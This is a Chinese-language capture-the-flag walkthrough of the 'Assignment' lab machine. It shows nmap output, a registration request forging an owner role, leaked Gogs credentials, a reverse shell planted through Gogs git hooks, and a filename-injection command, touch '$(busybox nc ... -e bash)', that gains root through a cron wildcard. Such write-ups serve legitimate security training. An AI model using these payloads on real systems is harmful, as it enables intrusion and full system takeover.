Assignment pg walkthrough Easy 通配符提权变种

news/2024/11/14 16:34:10/文章来源:https://www.cnblogs.com/wssw/p/18545733
nmap 扫描 
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.157.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:18 UTC
Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 04:19 (0:00:11 remaining)
Nmap scan report for 192.168.157.224
Host is up (0.070s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp   open  http
|_http-title: notes.pg
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|_    Content-Length: 0
8000/tcp open  http-alt
|_http-title: Gogs
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=9c1c666d796b5320; Path=/; HttpOnly
|     Set-Cookie: _csrf=9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nzk1NjExOTI4NjE3Mg; Path=/; Domain=assignment.pg; Expires=Fri, 15 Nov 2024 04:19:16 GMT; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     Date: Thu, 14 Nov 2024 04:19:16 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nz
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=0701106d56e58fd6; Path=/; HttpOnly
|     Set-Cookie: _csrf=mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3MjcyNTg2MA; Path=/; Domain=assignment.pg; Expires=Fri, 15 Nov 2024 04:19:10 GMT; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     Date: Thu, 14 Nov 2024 04:19:10 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|_    <meta name="_csrf" content="mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3M
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=11/14%Time=67357A3E%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,55,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/h
SF:tml;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,5
SF:5,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/html;\x20char
SF:set=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,1C,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\n\r\n")%r(X11Probe,1C,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\n\r\n")%r(FourOhFourRequest,55,"HTTP/1\.0\x20403\x20Fo
SF:rbidden\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Leng
SF:th:\x200\r\n\r\n")%r(GenericLines,1C,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\n\r\n")%r(RPCCheck,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")
SF:%r(DNSVersionBindReqTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n"
SF:)%r(DNSStatusRequestTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n"
SF:)%r(Help,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(SSLSessionR
SF:eq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TerminalServerCoo
SF:kie,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TLSSessionReq,1C
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(Kerberos,1C,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\n\r\n")%r(SMBProgNeg,1C,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\n\r\n")%r(LPDString,1C,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\n\r\n")%r(LDAPSearchReq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\n\r\n")%r(LDAPBindReq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n
SF:")%r(SIPOptions,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(LAND
SF:esk-RC,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TerminalServe
SF:r,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(NCP,1C,"HTTP/1\.1\
SF:x20400\x20Bad\x20Request\r\n\r\n")%r(NotesRPC,1C,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\n\r\n")%r(JavaRMI,1C,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\n\r\n")%r(WMSRequest,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n
SF:")%r(oracle-tns,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(ms-s
SF:ql-s,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(afp,1C,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\n\r\n")%r(giop,1C,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8000-TCP:V=7.94SVN%I=7%D=11/14%Time=67357A3E%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(GetRequest,206A,"HTTP/1\.0\x20200\x20OK\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Pat
SF:h=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=0701106d56e58f
SF:d6;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=mFYAKLkp10tztyPKEtdZ
SF:WiAkRgc6MTczMTU1Nzk1MDg3MjcyNTg2MA;\x20Path=/;\x20Domain=assignment\.pg
SF:;\x20Expires=Fri,\x2015\x20Nov\x202024\x2004:19:10\x20GMT;\x20HttpOnly\
SF:r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nDa
SF:te:\x20Thu,\x2014\x20Nov\x202024\x2004:19:10\x20GMT\r\n\r\n<!DOCTYPE\x2
SF:0html>\n<html>\n<head\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Con
SF:tent-Type\"\x20content=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x
SF:20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<met
SF:a\x20name=\"author\"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"des
SF:cription\"\x20content=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20G
SF:it\x20service\"\x20/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\
SF:x20git,\x20self-hosted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x2
SF:0content=\"no-referrer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"
SF:mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3M")%r(FourOhFourRequest,1C3
SF:E,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html;\x20c
SF:harset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x20Max-Age=214748
SF:3647\r\nSet-Cookie:\x20i_like_gogs=9c1c666d796b5320;\x20Path=/;\x20Http
SF:Only\r\nSet-Cookie:\x20_csrf=9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nzk1Nj
SF:ExOTI4NjE3Mg;\x20Path=/;\x20Domain=assignment\.pg;\x20Expires=Fri,\x201
SF:5\x20Nov\x202024\x2004:19:16\x20GMT;\x20HttpOnly\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nDate:\x20Thu,\x2014\x20N
SF:ov\x202024\x2004:19:16\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\
SF:x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content
SF:=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Co
SF:mpatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x
SF:20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=
SF:\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\
SF:n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted
SF:,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer
SF:\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"9VAZhezhUc2tZS5fWa9Dnk
SF:4uzHs6MTczMTU1Nz");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/14%OT=22%CT=1%CU=44730%PV=Y%DS=4%DC=T%G=Y%TM=673
OS:57AA6%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M57
OS:8ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   70.35 ms 192.168.45.1
2   70.34 ms 192.168.45.254
3   70.38 ms 192.168.251.1
4   70.57 ms 192.168.157.224OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.44 seconds
web 80端口注册个账号 登录发现 
authenticity_token=oPR93X4UzlLdlPeg_Aek9v3XDDJLLoL3hXS8pHLwzOPz8ER61j8nzjESjr4Tsq-_VGRhZBVCZ9TSr9VZqIe5YQ&user[username]=forged_owner&user[role]=owner&user[password]=forged_owner&user[password_confirmation]=forged_owner&button=
信息泄露

登录这个用户
http://192.168.157.224/notes/1 访问发现有新密码
image

my creds for gogs: jane:svc-dev2022@@@!;P;4SSw0Rd

利用这个密码进入8000
image

创建一个仓库之后
发现有git hooks 功能 由于之前做过一两个靶场也涉及到了git hooks 所以就比较敏感
估计是个命令执行
直接在最后一 插入反弹shell代码
image

git push上去之后代码就会执行反弹shell了 
git init
git add README.md
git commit -m "first commit"
git push

image

image

执行pspy64脚本
发现有个定时任务
image

image
这类似于通配符提权的变种形式 可以直接命令注入
touch '$(busybox nc 192.168.45.250 8000 -e bash)'
弹完shell 之后就是root了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/833470.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

变量的存储方式和生存期

变量的存储方式和生存期

变量的存储方式和生存期变量的存储方式和生存期 动态存储方式与静态存储方式 从变量的作用域(即从空间)的角度来观察,变量可以分为全局变量和局部变量 从变量存在的时间(即生存期)来观察:有的变量在程序运行的整个过程都是存在的,而有的变量则是在调用其所在的函数时才临…
阅读更多...
Whalestudio助力西南某商业银行数据中台建设 | 实践探索

Whalestudio助力西南某商业银行数据中台建设 | 实践探索

在数字化转型的浪潮下,银行业对数据的依赖日益加深。为提升数据管理和应用水平,西南某城商行于2022年启动了数据中台建设,采用创新技术手段优化其数据服务体系。 本文将深入探讨该行如何借助Whalestudio平台构建数据中台,以及在实际应用中取得的显著成效。 从需求到选择:数…
阅读更多...
详解漏斗模型及如何通过行为设计提升转化率

详解漏斗模型及如何通过行为设计提升转化率

详解漏斗模型及如何通过行为设计提升转化率 | 人人都是产品经理 https://www.woshipm.com/pd/1695380.html 详解漏斗模型及如何通过行为设计提升转化率2018-12-05 3 评论63515 浏览267 收藏12 分钟 漏斗模型,是一种数据分析方式,是一个线性流程,更是一种普遍适用的方法论,或…
阅读更多...
【FMC155A】基于VITA57.1标准的2路500MSPS/1GSPS/1.25GSPS 14位AD采集FMC子卡模块(交流耦合)

【FMC155A】基于VITA57.1标准的2路500MSPS/1GSPS/1.25GSPS 14位AD采集FMC子卡模块(交流耦合)

​板卡概述 FMC155A是一款基于VITA57.1标准的,实现2路14-bit、500MSPS/1GSPS/1.25GSPS 采样率交流耦合ADC同步采集FMC子卡模块。该模块遵循VITA57.1规范,可直接与FPGA载卡配合使用,板卡ADC器件采用ADI的AD9680芯片,该芯片具有两个模拟输入通道和两个JESD204B输出数据通道对…
阅读更多...
在华为开发者空间,简单几步带你实现AI风格化编程

在华为开发者空间,简单几步带你实现AI风格化编程

通过调用ModelArts上的动漫头像制作应用,将头像图片转化为动漫风格的头像图片。本文分享自华为云社区《【开发者空间实践指导】基于FunctionGraph的AI风格化编程》,作者:开发者空间小蜜蜂。 一、 案例介绍 本实验基于FunctionGraph和ModelArts的智能头像动漫化处理应用。通过…
阅读更多...
皮带跑偏识别智慧矿山一体机皮带运行状态识别如何与EasyCVR平台搭建煤矿矿井安全监控系统?

皮带跑偏识别智慧矿山一体机皮带运行状态识别如何与EasyCVR平台搭建煤矿矿井安全监控系统?

在煤矿行业,安全始终是最为关键的议题。随着智能化技术的发展,智慧矿山一体机与EasyCVR平台的结合为煤矿矿井安全监控系统提供了一种全新的解决方案。这种集成化的系统不仅能够实现对煤矿生产过程的实时监控和管理,还能提高矿山的安全性和生产效率,同时降低人工巡检的成本和…
阅读更多...
vmstat的使用

vmstat的使用

1.用法 vmstat [-a] [-n] [-S unit] [delay [ count]] vmstat [-s] [-n] [-S unit] vmstat [-m] [-n] [delay [ count]] vmstat [-d] [-n] [delay [ count]] vmstat [-p disk partition] [-n] [delay [ count]] vmstat [-f] vmstat [-V] -a:显示活跃和非活跃内存 -f:显示从系…
阅读更多...
PNP和NPN三极管区别

PNP和NPN三极管区别

主要区别是电流流向和电压不同:1. PNP管子是发射极流入后从基极和集电极流出,NPN管子是基极和集电极流入从发射极流出。 2. PNP管子工作在放大区时电压是,Ue>Ub>Uc,NPN管子工作在放大区时电压时Uc>Ub>Ue。 3. PNP是共阴极,即两个PN结的N结相连做为基极,…
阅读更多...
关于伺服电子齿轮比

关于伺服电子齿轮比

一、首先是术语解释: 1.编码器分辨率:多少个脉冲每转。如分辨率为18位,代表需要发262144个脉冲转一圈。2.脉冲当量:发一个脉冲,电机能走多少距离,也就是电机的最小精度。 3.丝杆螺距:表示丝杆转一圈多少毫米。 4.减速比:A(从轮):B(主轮) 5.电子齿轮比:分子是电机编码器…
阅读更多...
ubuntu destop修改终端字体大小(Terminal)

ubuntu destop修改终端字体大小(Terminal)

背景 初始字体太大,窗口小,看不了几行 调整效果舒服多了 可根据自己的需要做调整
阅读更多...
CBT

CBT

设置扬声器阵列,预先设置扬声器阵列的覆盖角 根据扬声器阵列的覆盖角得到截止频率F 将音频信号小于截止频率F的频段采用空间重采样法进行恒定束宽控制;将音频信号大于或等于截止频率F的频段采用CBT阵列理论进行恒定束宽控制;基本流程图如下:step1: 首先,确定系统参数. 根据…
阅读更多...
使用IDEA插件(dbDoc)生成数据库字典

使用IDEA插件(dbDoc)生成数据库字典

https://blog.csdn.net/taotao6086/article/details/123324472 https://github.com/godmaybelieve
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023